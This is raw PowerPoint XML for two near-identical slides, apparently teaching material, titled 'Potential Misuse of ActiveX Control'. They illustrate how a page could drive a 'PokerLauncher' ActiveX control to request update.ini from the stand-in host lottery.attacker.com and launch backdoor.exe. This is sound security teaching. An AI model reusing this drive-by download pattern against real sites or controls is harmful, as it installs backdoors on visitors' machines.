      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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04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04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6" grpId="0" animBg="1"/>
      <p:bldP spid="20488" grpId="0" animBg="1"/>
      <p:bldP spid="13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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9D148758-E58F-45E8-ACC7-B49FA17C4A92}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potential Misuse of ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21509" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="21510" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4560888" y="4067175"/>
            <a:ext cx="3929062" cy="2500313"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8606"/>
              <a:gd name="adj2" fmla="val -65995"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FileVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FileSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5340</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DownFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor.zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DownFileSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3450</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21513" name="Picture 3" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\81YR0P6F\MCj02825920000[1].wm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418388" y="1493838"/>
            <a:ext cx="3214687" cy="2287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4" name="그룹 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2984626" y="1967812"/>
            <a:ext cx="1361942" cy="1741381"/>
            <a:chOff x="2900129" y="1967812"/>
            <a:chExt cx="1361942" cy="1741381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf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2905118" y="1967812"/>
              <a:ext cx="1356953" cy="16818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6" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2900129" y="3432194"/>
              <a:ext cx="1303563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ko-KR" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21511" name="직사각형 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488950" y="1993900"/>
            <a:ext cx="2928924" cy="1631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en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= "……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;param name="Server" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://lottery.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21514" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4418006" y="1779588"/>
            <a:ext cx="3214710" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33304"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>update.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4418006" y="2917755"/>
            <a:ext cx="3143272" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>pdate.ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>to contain </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>info about  a backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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15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15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10" grpId="0" animBg="1"/>
      <p:bldP spid="21514" grpId="0" animBg="1"/>
      <p:bldP spid="18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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{62E964FF-8253-46CF-BB40-18F795D86D0D}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potential Misuse of ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22533" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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pic>
        <p:nvPicPr>
          <p:cNvPr id="22540" name="Picture 3" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\81YR0P6F\MCj02825920000[1].wm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418388" y="1493838"/>
            <a:ext cx="3214687" cy="2287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7" name="그룹 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2984626" y="1967812"/>
            <a:ext cx="1361942" cy="1741381"/>
            <a:chOff x="2900129" y="1967812"/>
            <a:chExt cx="1361942" cy="1741381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf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2905118" y="1967812"/>
              <a:ext cx="1356953" cy="16818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9" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2900129" y="3432194"/>
              <a:ext cx="1303563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ko-KR" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488950" y="1993900"/>
            <a:ext cx="2928924" cy="1631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en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= "……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;param name="Server" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://lottery.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
